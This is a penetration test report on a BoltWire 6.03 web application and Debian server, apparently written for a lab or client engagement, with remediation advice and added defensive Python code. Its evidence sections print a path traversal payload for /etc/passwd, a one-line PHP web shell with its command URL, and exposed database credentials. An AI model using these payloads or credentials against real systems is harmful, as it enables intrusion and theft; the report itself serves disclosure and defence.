Date: August 13, 2024
Pentester: Eno Leriand
- Report Overview
- Observations
- Testing Methodology
- Technical Findings
- 4.1 Critical Vulnerability: Local File Inclusion (LFI) in BoltWire
- 4.2 Critical Vulnerability: File Upload Vulnerability in BoltWire
- 4.3 High Vulnerability: Weak SSH Configuration
- 4.4 Medium Vulnerability: Exposed Configuration Files
- 4.5 Medium Vulnerability: Exposed Directory Indexing
- 4.6 Summary of Technical Findings
- Conclusion
- Appendices
This report provides a detailed overview of the penetration test conducted on the target system 192.168.8.4. Critical vulnerabilities such as Local File Inclusion (LFI) and File Upload flaws were discovered, potentially allowing full system compromise. The recommendations outlined in this report are crucial to enhance the security posture of the system.
The engagement was conducted on August 13, 2024, focusing on evaluating the security of the target system through a black box testing approach. Key goals included identifying security weaknesses, assessing their impact, and providing actionable remediation.
The scope was limited to the single host 192.168.8.4 and was treated as an external network penetration test. The systems tested were a Linux (Debian) server and the BoltWire web application hosted on it.
This section provides a high-level overview of the security posture of the target system. A detailed list of all discovered vulnerabilities can be found in Section 4.
- Critical: Update BoltWire and secure file uploads to prevent code execution.
- High: Improve SSH configurations by disabling password authentication and using key-based methods.
- Medium: Restrict access to sensitive configuration files and disable directory indexing.
The target system had SSL/TLS encryption and basic access controls in place, which mitigated some potential attack vectors.
The following table provides a summary of compliance considerations identified during the engagement:
| Compliance Standard | Requirement | Violation | Reference |
|---|---|---|---|
| PCI DSS | 1.1.4 Firewall Configuration | Firewall not implemented at every internet connection. | Sections 4.1, 4.2 |
| PCI DSS | 2.1 Remove Default Accounts | Default accounts were not removed from all systems on the network. | Sections 4.3, 4.4 |
| PCI DSS | 2.2 Secure Configuration | Insecure configurations found, lacking documentation and best practices. | Sections 4.3, 4.4, 4.5 |
| NIST SP 800-53 | AC-2 Account Management | Improper management of user accounts and privileges. | Sections 4.3, 4.4 |
| NIST SP 800-53 | SC-7 Boundary Protection | Lack of proper network segmentation and boundary protection. | Sections 4.1, 4.2 |
| GDPR | Article 32 Security of Processing | Exposed sensitive data due to misconfigured access controls. | Sections 4.4, 4.5 |
The Penetration Testing Execution Standard (PTES) was referenced throughout the engagement to ensure a comprehensive and standardized approach to the penetration test. PTES defines a structured methodology that covers all aspects of a penetration test, from pre-engagement interactions to reporting.
The PTES framework consists of the following seven phases:
- Pre-engagement Interactions: Initial discussions with the client to define the scope, objectives, and constraints of the penetration test. This phase ensures both parties understand the engagement's goals and boundaries.
- Intelligence Gathering: Collecting information about the target environment through passive reconnaissance. This may include gathering details about network infrastructure, public-facing systems, and technologies in use.
- Threat Modeling: Analyzing the gathered intelligence to identify potential attack vectors. This phase helps prioritize targets and tailor the attack plan based on the client's risk profile.
- Vulnerability Analysis: Identifying vulnerabilities in the target environment using automated tools and manual testing techniques. This phase involves scanning for open ports, misconfigurations, outdated software, and other potential weaknesses.
- Exploitation: Attempting to exploit identified vulnerabilities to gain unauthorized access or escalate privileges within the target environment. This phase focuses on demonstrating the impact of vulnerabilities by executing controlled attacks.
- Post-Exploitation: Assessing the value of the compromised systems and gathering additional information that may lead to further exploitation. This phase is crucial for understanding the extent of the compromise and potential impacts.
- Reporting: Documenting the findings, methodologies, and remediation recommendations. The final report is delivered to the client, summarizing the engagement and providing actionable steps to mitigate identified risks.
MITRE ATT&CK is a knowledge base of Tactics, Techniques, and Procedures (TTPs) based on real-world observations from cybersecurity professionals. The framework categorizes adversary behaviors across different stages of an attack, providing a structured way to understand and defend against various threats. It is widely used for threat modeling, detection, and incident response.
| Tactic | Technique | Description |
|---|---|---|
| Initial Access | T1078 - Valid Accounts | Adversaries may use valid accounts to gain access to resources or systems. |
| Execution | T1059 - Command and Scripting Interpreter | Use of a scripting interpreter such as PHP (here, an uploaded web shell, T1505.003) to execute arbitrary commands on a web server. |
| Persistence | T1098 - Account Manipulation | Adversaries may modify accounts to maintain access to a system. |
| Privilege Escalation | T1068 - Exploitation for Privilege Escalation | Exploiting a vulnerability to gain higher-level privileges. |
| Defense Evasion | T1070 - Indicator Removal on Host | Clearing logs or artifacts to avoid detection. |
| Credential Access | T1552.001 - Unsecured Credentials: Credentials in Files | Stealing credentials stored in files on a compromised system. |
| Discovery | T1083 - File and Directory Discovery | Adversaries may search for files and directories that contain valuable data. |
| Lateral Movement | T1021 - Remote Services | Using remote services to move laterally through a network. |
| Collection | T1114 - Email Collection | Collecting emails from a compromised user or system. |
| Command and Control | T1071 - Application Layer Protocol | Using standard application layer protocols for command and control. |
| Exfiltration | T1041 - Exfiltration Over C2 Channel | Exfiltrating data through an established command and control channel. |
| Impact | T1486 - Data Encrypted for Impact | Encrypting data to disrupt operations or extort payment. |
Referenced in this report is the OWASP Top 10, focusing on common vulnerabilities that pose significant risks to web applications:
| OWASP Top 10 Category | Description |
|---|---|
| 1. Broken Access Control | Improper enforcement of access controls. |
| 2. Cryptographic Failures | Inadequate protection of data. |
| 3. Injection | Injection flaws such as SQL, NoSQL, Command Injection. |
| 4. Insecure Design | Design flaws leading to security weaknesses. |
| 5. Security Misconfiguration | Insecure configuration of systems and applications. |
| 6. Vulnerable and Outdated Components | Use of components with known vulnerabilities. |
| 7. Identification and Authentication Failures | Weak authentication mechanisms. |
| 8. Software and Data Integrity Failures | Failures in ensuring software/data integrity. |
| 9. Security Logging and Monitoring Failures | Inadequate logging/monitoring. |
| 10. Server-Side Request Forgery (SSRF) | Server-Side Request Forgery vulnerabilities. |
The test included an assessment of PCI DSS compliance to identify areas requiring improvement to protect cardholder data.
Control measures were evaluated against NIST SP 800-53 guidelines, addressing risk management and information protection.
| NIST 800-53 Control Family | Description |
|---|---|
| AC: Access Control | Controls related to restricting access to information. |
| AU: Audit and Accountability | Controls for logging and monitoring activities. |
| CM: Configuration Management | Controls for managing system configurations. |
| IR: Incident Response | Controls for preparing and responding to security incidents. |
This section provides an overview of the vulnerabilities discovered during the penetration test, categorized by their risk level. The risk levels were derived from Common Vulnerability Scoring System (CVSS) base scores. The single Low item is the Apache version disclosure reported by Nuclei (Appendix B); it is not written up as a separate finding in Sections 4.1 to 4.5.
| Severity Level | Low | Medium | High | Critical |
|---|---|---|---|---|
| Vulnerability Count | 1 | 2 | 1 | 2 |
The following table breaks down the discovered vulnerabilities by their overall risk score, impact, and exploitability. Base scores were taken from the CVSS calculator; the vector strings quoted in each finding below use the CVSS v2 metric notation (AV/AC/Au/C/I/A).
| Vulnerability | Overall Risk Score | Impact | Exploitability |
|---|---|---|---|
| Local File Inclusion (LFI) in BoltWire | 9.3 | 9.0 | 10 |
| File Upload Vulnerability in BoltWire | 9.8 | 9.5 | 10 |
| Weak SSH Configuration | 7.5 | 7.0 | 8.5 |
| Exposed Configuration Files | 5.5 | 5.0 | 6.0 |
| Exposed Directory Indexing | 5.0 | 4.5 | 5.5 |
- Description: BoltWire Version 6.03 on the target system contains a Local File Inclusion (LFI) vulnerability that allows an attacker to include local files on the server.
- Evidence: Read access to `/etc/passwd` was obtained by supplying the payload `../../../../../../../etc/passwd` in the `action` parameter of `index.php?p=action.search&action=`.
- Severity Level: Critical
- CVSS Score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
- MITRE ATT&CK Mapping: T1005 - Data from Local System
- Impact: Exploiting this vulnerability could allow an attacker to access sensitive system files, leading to further system compromise.
- Recommendation:
- Update BoltWire to the latest version that addresses this vulnerability.
- Implement strict input validation to prevent similar attacks.
- References:
- OWASP: Local File Inclusion (LFI)
- MITRE ATT&CK: Data from Local System (T1005)
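As an added example (not BoltWire's code; the report does not show the vulnerable resolver), the following Python contrasts the path-joining pattern that produces an LFI with a hardened resolver that rejects the exact payload from the evidence above. The page-directory layout and the mapping of `action` to a page file are assumptions made for the example.

```python
"""Added example, not BoltWire's own code: the resolver pattern behind an LFI,
beside a hardened resolver that rejects the payload quoted in the finding.
The CMS layout (a `pages` directory, `action` naming a file in it) is assumed."""
import os
import tempfile

# The traversal payload quoted in the finding.
REPORTED_PAYLOAD = "../../../../../../../etc/passwd"

# Page names are restricted to this character set; no slash, so no traversal.
ALLOWED = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._-")


def resolve_unsafe(page_root, action):
    """Vulnerable pattern: user input is joined straight onto a base path,
    so '..' components walk out of page_root."""
    return os.path.normpath(os.path.join(page_root, action))


def resolve_safe(page_root, action):
    """Hardened pattern: syntactic allowlist first, then a canonical-path
    containment check. Raises ValueError instead of serving the file."""
    if not action or action.startswith(".") or any(c not in ALLOWED for c in action):
        raise ValueError("rejected page name: %r" % action)
    root = os.path.realpath(page_root)
    candidate = os.path.realpath(os.path.join(root, action))
    # realpath collapses '..' and follows symlinks; commonpath then proves the
    # result is still below root even if a page file is a symlink elsewhere.
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("path escapes page root: %s" % candidate)
    return candidate


def demo():
    """Exercises both resolvers against a scratch page directory; returns a dict."""
    with tempfile.TemporaryDirectory() as tmp:
        pages = os.path.join(tmp, "pages")
        os.mkdir(pages)
        with open(os.path.join(pages, "site.home"), "w") as fh:
            fh.write("welcome")  # constructed page file
        root = os.path.realpath(pages)
        unsafe = resolve_unsafe(pages, REPORTED_PAYLOAD)
        try:
            resolve_safe(pages, REPORTED_PAYLOAD)
            blocked = False
        except ValueError:
            blocked = True
        benign = resolve_safe(pages, "site.home")
        return {
            "unsafe_result": unsafe,
            "unsafe_escapes_root": os.path.commonpath([root, os.path.realpath(unsafe)]) != root,
            "safe_blocks_payload": blocked,
            "safe_benign_ok": benign == os.path.join(root, "site.home"),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The character allowlist alone stops the reported payload; the realpath/commonpath check is the second layer, so a symlinked page file or a later relaxation of the allowlist still cannot reach outside the page directory.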
- Description: The file upload function on the page `http://192.168.8.4:8080/dev/index.php?p=action.search&action=create` contains a vulnerability that allows an attacker to upload and execute a PHP shell.
- Evidence: A simple PHP shell, `<?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?>`, was successfully uploaded and used to execute commands. The shell was accessed via the following URL: `http://192.168.8.4/shell.php?cmd=whoami`
- Severity Level: Critical
- CVSS Score: 9.8 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
- MITRE ATT&CK Mapping: T1505.003 - Server Software Component: Web Shell; T1059 - Command and Scripting Interpreter
- Impact: This vulnerability allows an attacker to execute arbitrary commands on the server, potentially leading to full control over the system.
- Recommendation:
- Update BoltWire to close this vulnerability.
- Ensure proper file upload validation is implemented to prevent the upload of malicious files.
- References:
- OWASP: Unrestricted File Upload
- MITRE ATT&CK: Server Software Component: Web Shell (T1505.003); Command and Scripting Interpreter (T1059)
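As an added example, not BoltWire's upload handler (which the report does not show), here is the server-side validation that would have rejected `shell.php`. The image-only policy and the (filename, bytes) interface are assumptions; the sample uploads are constructed, the first being the shell from the evidence above.

```python
"""Added example, not BoltWire's own upload handler: server-side checks that
reject the PHP shell from the finding, a double-extension variant and an
image/PHP polyglot. The image-only policy is an assumption for the example."""
import re

# Constructed sample uploads; the first is the shell quoted in the finding.
SAMPLES = {
    "shell.php": b"<?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?>",
    "shell.php.png": b"<?php system($_GET['cmd']); ?>",                   # double extension
    "logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,                       # real PNG signature
    "photo.jpg": b"\xff\xd8\xff\xe0" + b"<?php echo 1; ?>" + b"\x00" * 16,  # JPEG/PHP polyglot
    "notes.txt": b"plain text",
}

# Allowed extensions, each with the magic bytes the content must begin with.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
MAX_BYTES = 2_000_000


def validate_upload(filename, data):
    """Returns (accepted, reason). Each check on its own is enough to reject."""
    if len(data) > MAX_BYTES:
        return False, "too large"
    parts = filename.lower().split(".")
    # Exactly one extension: 'shell.php.png' fails here, 'shell.php' fails below.
    if len(parts) != 2 or not parts[0]:
        return False, "missing, dotfile or multiple extensions"
    ext = parts[1]
    if ext not in ALLOWED_TYPES:
        return False, "extension .%s not allowed" % ext
    if not data.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match declared type"
    # A valid image can still carry a PHP payload; refuse it outright rather
    # than relying on the web server never executing the stored file.
    if PHP_TAG.search(data):
        return False, "embedded PHP tag"
    return True, "ok"


def check_all():
    """Runs every constructed sample through the validator -> {name: accepted}."""
    return {name: validate_upload(name, data)[0] for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, validate_upload(name, data))
```

Validation is only half of the fix: the upload directory should also sit outside the web root, or have script execution disabled for it, so that a bypass of these checks still cannot turn an uploaded file into a shell.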
- Description: The SSH configuration was found to use weak algorithms and has password authentication enabled, making the system vulnerable to brute force attacks.
- Evidence: SSH offered the weak HMAC-SHA1 MAC algorithm (`hmac-sha1`), and password authentication was enabled.
- Severity Level: High
- CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
- MITRE ATT&CK Mapping: T1110.001 - Brute Force: Password Guessing
- Impact: An attacker could perform brute force attacks to gain SSH access, particularly if weak passwords are used.
- Recommendation:
- Disable password authentication and enforce key-based authentication.
- Remove HMAC-SHA1 MACs (`hmac-sha1` and its variants) from the sshd `MACs` list.
- Patch or upgrade OpenSSH to address vulnerabilities such as CVE-2023-48795 (the Terrapin prefix-truncation attack, fixed by the strict key exchange extension); until the upgrade is in place, stop offering `chacha20-poly1305@openssh.com` and CBC ciphers, which are the suites the attack needs.
- References:
- NIST SP 800-123: Guide to General Server Security
- MITRE ATT&CK: Brute Force: Password Guessing (T1110.001)
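As an added example (not output from the target, and not the target's real `sshd_config`), the following offline audit flags the weaknesses in this finding and stays silent on the hardened directive set recommended above. Both sample configurations are constructed; `WEAK_CONFIG` mirrors the reported state rather than reproducing the actual file.

```python
"""Added example, not output from the target: an offline sshd_config audit for
the weaknesses in this finding. Both configurations below are constructed."""
import re

WEAK_CONFIG = """\
# constructed sample mirroring the finding, not the target's real file
Port 22
PasswordAuthentication yes
PermitRootLogin yes
MACs hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha2-256
Ciphers aes128-cbc,chacha20-poly1305@openssh.com,aes256-ctr
"""

HARDENED_CONFIG = """\
PasswordAuthentication no
PubkeyAuthentication yes
PermitRootLogin prohibit-password
MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com
Ciphers aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr
KexAlgorithms curve25519-sha256,curve25519-sha256@libssh.org
"""


def parse_sshd_config(text):
    """Directive (lowercased) -> value. sshd honours the first occurrence of a
    keyword, so later duplicates are ignored here as well."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = re.split(r"[\s=]+", line, maxsplit=1)  # 'Key value' or 'Key=value'
        if len(fields) != 2:
            continue
        conf.setdefault(fields[0].lower(), fields[1].strip())
    return conf


def audit(conf):
    """Returns a list of (directive, problem) pairs; an empty list means clean."""
    issues = []
    # sshd defaults to password authentication on when the directive is absent.
    if conf.get("passwordauthentication", "yes").lower() == "yes":
        issues.append(("PasswordAuthentication", "password logins enabled; permits online brute force"))
    if conf.get("permitrootlogin", "prohibit-password").lower() == "yes":
        issues.append(("PermitRootLogin", "root may authenticate with a password"))
    macs = [m.strip().lower() for m in conf.get("macs", "").split(",") if m.strip()]
    ciphers = [c.strip().lower() for c in conf.get("ciphers", "").split(",") if c.strip()]
    if not macs:
        issues.append(("MACs", "not set; the OpenSSH default list still offers hmac-sha1"))
    weak_macs = [m for m in macs if "sha1" in m or "md5" in m or m.endswith("-96")]
    if weak_macs:
        issues.append(("MACs", "weak MACs offered: " + ",".join(weak_macs)))
    cbc = [c for c in ciphers if c.endswith("-cbc")]
    if cbc:
        issues.append(("Ciphers", "CBC ciphers offered: " + ",".join(cbc)))
    # CVE-2023-48795 (Terrapin) needs chacha20-poly1305, or a CBC cipher together
    # with an encrypt-then-MAC MAC, negotiated with a server that lacks strict
    # key exchange. OpenSSH 7.9 has no strict kex, so apart from upgrading the
    # only mitigation is to stop offering those suites.
    etm = any(m.endswith("-etm@openssh.com") for m in macs)
    if "chacha20-poly1305@openssh.com" in ciphers or (cbc and etm):
        issues.append(("Ciphers/MACs", "CVE-2023-48795 exposure: chacha20-poly1305 or CBC+EtM negotiable"))
    return issues


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit(parse_sshd_config(text)))
```

The audit reads the file rather than probing the service, so it can be run by the system owner before and after the change; the same `MACs`/`Ciphers` lists can be confirmed from the network side with `ssh -Q mac` and `ssh -Q cipher` on a client, or a banner-level scanner, once the daemon has been restarted.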
- Description: The `.gitignore` and `config.yml` files were found to be exposed on the server, the latter containing sensitive information such as database credentials.
- Evidence: The `.gitignore` file was accessible at `http://192.168.8.4/.gitignore` and referenced the configuration file `config.yml`, which was itself retrievable and contained the following credentials:
  - Username: `bolt`
  - Password: `I_love_java`
- Severity Level: Medium
- CVSS Score: 5.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
- MITRE ATT&CK Mapping: T1552.001 - Unsecured Credentials: Credentials in Files
- Impact: These credentials could be used by an attacker to gain unauthorized access to the database, compromising sensitive information.
- Recommendation:
- Restrict access to sensitive configuration files.
- Immediately change any exposed credentials to prevent unauthorized access.
- Implement proper access control mechanisms to prevent unauthorized access to configuration files in the future.
- References:
- OWASP: Sensitive Data Exposure
- MITRE ATT&CK: Unsecured Credentials: Credentials in Files (T1552.001)
- Description: Directory indexing is enabled at `http://192.168.8.4:8080/dev/pages/`, allowing an attacker to browse and access files within the directory.
- Evidence: Files such as `member.admin` and `site.linkrot` were visible within the indexed directory.
- Severity Level: Medium
- CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
- MITRE ATT&CK Mapping: T1083 - File and Directory Discovery
- Impact: Exposed files could provide an attacker with additional information about the server's structure and potentially sensitive data.
- Recommendation:
- Disable directory indexing to prevent unauthorized browsing of directories.
- Implement a review process to ensure that directory indexing is disabled across all relevant directories on the server.
- References:
- OWASP: Directory Listing
- MITRE ATT&CK: File and Directory Discovery (T1083)
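As an added example, not part of the report or of any tool it lists, the following detection logic covers the request patterns behind findings 4.1 through 4.5 (traversal in a query parameter, a `cmd=` request to a PHP file, dotfile and configuration-file fetches, and a successful request for a bare directory path). It runs over constructed Apache combined-format log lines; the source IPs and timestamps are invented.

```python
"""Added example, not from the report: detection rules for the request patterns
behind findings 4.1 to 4.5, run over constructed Apache combined-log lines."""
import re
from urllib.parse import unquote

# Constructed log lines; IPs and timestamps are invented for the example.
SAMPLE_LOG = """\
192.168.8.50 - - [13/Aug/2024:10:01:02 +0000] "GET /dev/index.php?p=action.search&action=../../../../../../../etc/passwd HTTP/1.1" 200 1873 "-" "Mozilla/5.0"
192.168.8.50 - - [13/Aug/2024:10:02:15 +0000] "GET /shell.php?cmd=whoami HTTP/1.1" 200 14 "-" "curl/8.0"
192.168.8.50 - - [13/Aug/2024:10:03:40 +0000] "GET /.gitignore HTTP/1.1" 200 52 "-" "Mozilla/5.0"
192.168.8.50 - - [13/Aug/2024:10:04:01 +0000] "GET /config.yml HTTP/1.1" 200 311 "-" "Mozilla/5.0"
192.168.8.50 - - [13/Aug/2024:10:05:22 +0000] "GET /dev/pages/ HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.168.8.77 - - [13/Aug/2024:10:06:00 +0000] "GET /dev/index.php?p=site.home HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)
SENSITIVE_FILES = {"config.yml", "composer.json", "readme.md", ".env"}
SHELL_PARAMS = re.compile(r"[?&](cmd|exec|command)=", re.IGNORECASE)


def parse_line(line):
    """Combined-log line -> dict, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Decode twice: '..' is often sent as %252e%252e to slip past single-decode filters.
    rec["decoded"] = unquote(unquote(rec["target"]))
    rec["path"], _, rec["query"] = rec["decoded"].partition("?")
    rec["status"] = int(rec["status"])
    return rec


def classify(rec):
    """Yields the rule names that fire for one parsed request."""
    decoded, path, status = rec["decoded"], rec["path"], rec["status"]
    if "../" in decoded or "..\\" in decoded:
        yield "path-traversal"          # finding 4.1
    if path.lower().endswith(".php") and SHELL_PARAMS.search("?" + rec["query"]):
        yield "webshell-command"        # finding 4.2
    parts = path.split("/")
    if any(p.startswith(".") and p not in (".", "..", ".well-known") for p in parts):
        yield "dotfile-request"         # finding 4.4 (.gitignore, .git/, .env)
    if parts[-1].lower() in SENSITIVE_FILES:
        yield "sensitive-file"          # finding 4.4 (config.yml) and Appendix C
    # From the log side, an enabled index looks like a 200 for a bare directory path.
    if status == 200 and path.endswith("/") and len(path) > 1:
        yield "directory-listing"       # finding 4.5


def scan(lines):
    """Returns one hit dict per (line, rule) pair."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for rule in classify(rec):
            hits.append({"rule": rule, "ip": rec["ip"], "target": rec["target"], "status": rec["status"]})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(hit)
```

The `directory-listing` rule is a heuristic (a 200 for a directory path also fires for a `DirectoryIndex` page), so treat it as a lead to confirm against the server configuration rather than as proof on its own; the other four rules are specific enough to alert on directly.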
The penetration test on IP 192.168.8.4 uncovered multiple critical vulnerabilities, including Local File Inclusion (LFI) and File Upload vulnerabilities in BoltWire, as well as weak SSH configurations and exposed sensitive files. These vulnerabilities pose significant risks, including unauthorized access, data leakage, and potential full system compromise. Immediate action is required to remediate these issues, with a prioritized plan to address the most severe vulnerabilities first. Following the recommendations and remediation plan provided in this report will help secure the system against potential exploitation and ensure compliance with relevant security standards.
Given the critical nature of some of the identified vulnerabilities, especially those related to the BoltWire application and SSH configuration, it is crucial that remediation efforts are initiated immediately to prevent potential exploitation.
Appendix A: Nmap Scan Output
Below is a summary of the Nmap scan results:
- Command Used: `nmap -sV -p 22,80,8080 192.168.8.4`
- Output:

```text
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
8080/tcp open  http    Apache httpd 2.4.38 ((Debian))
```
Appendix B: Nuclei Scan Output
Below is a summary of the Nuclei scan results:
- Command Used: `nuclei -u http://192.168.8.4 -t vulnerabilities/`
- Output:

| Vulnerability | Details | Risk Level | CVSS Score |
|---|---|---|---|
| Exposed Sensitive Files | composer.json, .gitignore, README.md accessible via HTTP | Medium | 5.3 |
| Apache Version Disclosure | Apache version detected as 2.4.38 (Debian) | Low (information disclosure) | 5.0 |
| Weak SSH Configuration | Password authentication enabled, weak hmac-sha1 MAC, vulnerable to CVE-2023-48795 | High | 7.5 |
Appendix C: Exposed Sensitive Files
The following sensitive files were identified as being exposed on the server:
- `.gitignore` at `http://192.168.8.4/.gitignore`
- `config.yml`, containing database credentials
- `composer.json` and `README.md`
Appendix D: Attack Scenarios
This appendix contains detailed descriptions of potential attack scenarios for each of the identified vulnerabilities, illustrating how an attacker might exploit them and the impact they could have.
- LFI Attack Scenario: An attacker could exploit the LFI vulnerability in BoltWire by including files such as `/etc/passwd`, leading to potential privilege escalation and unauthorized access.
- File Upload Exploitation: By uploading a malicious PHP shell, the attacker could gain remote code execution, allowing them to execute arbitrary commands and potentially compromise the entire server.
- Weak SSH Configuration Attack: Through brute force attacks leveraging the weak SSH configuration, an attacker could gain unauthorized access, leading to full control over the affected system.
Appendix E: References to Relevant Security Documentation
- OWASP Sensitive Data Exposure: Best practices to prevent exposure of sensitive data.
- MITRE ATT&CK Framework: A knowledge base of adversary tactics and techniques.
- PCI DSS Requirements: Security guidelines for processing payment card data.
- NIST Special Publication 800-53: Security and Privacy Controls for Federal Information Systems and Organizations.
Appendix F: Tools Used
This appendix lists the tools used during the penetration test:
| Tool | Description |
|---|---|
| Nmap | Network and service version scanner |
| Metasploit | Exploitation framework |
| DIRB | Directory brute force tool |
| Gobuster | Directory brute force tool |
| Hydra | Online password brute forcing tool |
| Wireshark | Network traffic analyzer |
| Burp Suite | Web traffic interception and analysis tool |
| psql | PostgreSQL interactive terminal |